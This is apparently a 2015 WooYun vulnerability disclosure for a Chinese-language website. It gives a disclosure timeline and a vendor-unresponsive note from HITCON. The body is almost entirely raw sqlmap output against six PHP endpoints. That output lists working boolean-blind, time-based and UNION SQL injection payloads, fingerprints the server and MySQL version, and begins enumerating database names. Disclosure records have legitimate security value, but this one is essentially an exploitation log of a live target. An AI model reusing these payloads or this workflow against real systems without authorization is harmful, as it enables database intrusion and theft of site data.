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漏洞概要 关注数(24) 关注此漏洞




漏洞作者: 路人甲

提交时间:2015-11-26 12:56

修复时间:2016-01-14 05:52

公开时间:2016-01-14 05:52





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开





C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/air.php?pk=1&lang=zh"  -
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151002}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:06:04
[09:06:04] [INFO] resuming back-end DBMS 'mysql'
[09:06:04] [INFO] testing connection to the target URL
[09:06:06] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
sqlmap resumed the following injection point(s) from stored session:
Parameter: pk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pk=1' AND 1879=1879 AND 'RvUo'='RvUo
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pk=1' AND (SELECT * FROM (SELECT(SLEEP(5)))lCzp) AND 'QAAZ'='QAAZ
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: pk=-8906' UNION ALL SELECT CONCAT(0x7162717a71,0x4a68496f546b4f6757
[09:06:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[09:06:07] [INFO] fetching database names
[09:06:08] [WARNING] reflective value(s) found and filtering out
[09:06:08] [WARNING] the SQL query provided does not return any output
[09:06:08] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:06:08] [INFO] fetching number of databases
[09:06:08] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:06:08] [INFO] retrieved: 3
[09:06:15] [INFO] retrieved: info


C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/pro_list.php?idept=3&lan
g=zh" --dbs
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151002}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:08:12
[09:08:12] [INFO] resuming back-end DBMS 'mysql'
[09:08:12] [INFO] testing connection to the target URL
[09:08:13] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
sqlmap resumed the following injection point(s) from stored session:
Parameter: idept (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idept=3' AND 3414=3414 AND 'VDWv'='VDWv&lang=zh
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: idept=3' AND (SELECT * FROM (SELECT(SLEEP(5)))WyPo) AND 'leMS'='leM
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: idept=-1856' UNION ALL SELECT CONCAT(0x71626b6b71,0x4d4e51784272694
26c52,0x716b766271)-- &lang=zh
[09:08:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[09:08:14] [INFO] fetching database names
[09:08:15] [WARNING] reflective value(s) found and filtering out
[09:08:15] [WARNING] the SQL query provided does not return any output
[09:08:15] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:08:15] [INFO] fetching number of databases
[09:08:15] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:08:15] [INFO] retrieved: 3
[09:08:22] [INFO] retrieved: i


C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/bus.php?pk=1&lang=zh"
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151002}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:09:47
[09:09:47] [INFO] resuming back-end DBMS 'mysql'
[09:09:47] [INFO] testing connection to the target URL
[09:09:50] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
sqlmap resumed the following injection point(s) from stored session:
Parameter: pk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pk=1' AND 2530=2530 AND 'beBl'='beBl&lang=zh
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pk=1' AND (SELECT * FROM (SELECT(SLEEP(5)))nLUP) AND 'aSKn'='aSKn&l
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: pk=-3356' UNION ALL SELECT CONCAT(0x71716a6b71,0x4e42656a734f4a5068
74,0x716b6a6b71)-- &lang=zh
[09:09:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[09:09:52] [INFO] fetching database names
[09:09:53] [WARNING] reflective value(s) found and filtering out
[09:09:53] [WARNING] the SQL query provided does not return any output
[09:09:53] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:09:53] [INFO] fetching number of databases
[09:09:53] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:09:53] [INFO] retrieved: 3
[09:10:03] [INFO] retrieved: information_sche



C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/pro_con.php?idept=3&pk=2
&page=0&lang=zh" --dbs
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151002}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:16:26
[09:16:26] [INFO] resuming back-end DBMS 'mysql'
[09:16:26] [INFO] testing connection to the target URL
[09:16:27] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
sqlmap resumed the following injection point(s) from stored session:
Parameter: pk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idept=3&pk=2' AND 8780=8780 AND 'bLXt'='bLXt&page=0&lang=zh
[09:16:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[09:16:28] [INFO] fetching database names
[09:16:28] [INFO] fetching number of databases
[09:16:28] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:16:28] [INFO] retrieved:
[09:16:29] [WARNING] reflective value(s) found and filtering out
[09:16:36] [INFO] retrieved:


C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/order_send.php?pk=2  --db
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151002}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:14:00
[09:14:00] [INFO] resuming back-end DBMS 'mysql'
[09:14:00] [INFO] testing connection to the target URL
[09:14:01] [INFO] heuristics detected web page charset 'ISO-8859-2'
[09:14:01] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
sqlmap resumed the following injection point(s) from stored session:
Parameter: pk (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pk=2' AND (SELECT * FROM (SELECT(SLEEP(5)))SLiC) AND 'Zjik'='Zjik
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: pk=-6709' UNION ALL SELECT CONCAT(0x7171767671,0x5770767351455a516d
[09:14:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[09:14:02] [INFO] fetching database names
[09:14:02] [WARNING] reflective value(s) found and filtering out
[09:14:02] [WARNING] the SQL query provided does not return any output
[09:14:02] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:14:02] [INFO] fetching number of databases
[09:14:02] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.............................
[09:14:23] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[09:15:00] [INFO] adjusting time delay to 2 seconds due to good response times
[09:15:03] [INFO] retrieved: i
[09:15:47] [ERROR] invalid character detected. retrying..
[09:15:47] [WARNING] increasing time delay to 3 seconds


C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/acc.php?pk=4&lang=zh"  -
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151002}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:18:02
[09:18:02] [INFO] resuming back-end DBMS 'mysql'
[09:18:02] [INFO] testing connection to the target URL
[09:18:03] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
sqlmap resumed the following injection point(s) from stored session:
Parameter: pk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pk=4' AND 7866=7866 AND 'GZzL'='GZzL&lang=zh
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pk=4' AND (SELECT * FROM (SELECT(SLEEP(5)))TJqG) AND 'eDZY'='eDZY&l
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: pk=-1539' UNION ALL SELECT CONCAT(0x7171717871,0x4f58684e4a42464e6c
62,0x717a7a6b71)-- &lang=zh
[09:18:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[09:18:04] [INFO] fetching database names
[09:18:05] [WARNING] reflective value(s) found and filtering out
[09:18:05] [WARNING] the SQL query provided does not return any output
[09:18:05] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[09:18:05] [INFO] fetching number of databases
[09:18:05] [INFO] resumed: 3
[09:18:05] [INFO] resuming partial value: information_
[09:18:05] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:18:05] [INFO] retrieved: sc



版权声明:转载请注明来源 路人甲@乌云





确认时间:2015-11-30 05:50




2016-01-12:HITCON 於接獲通報後除 email 該網站所示之服務信箱外,亦曾致電該網站負責人告知此漏洞,但對方至今仍無回應。

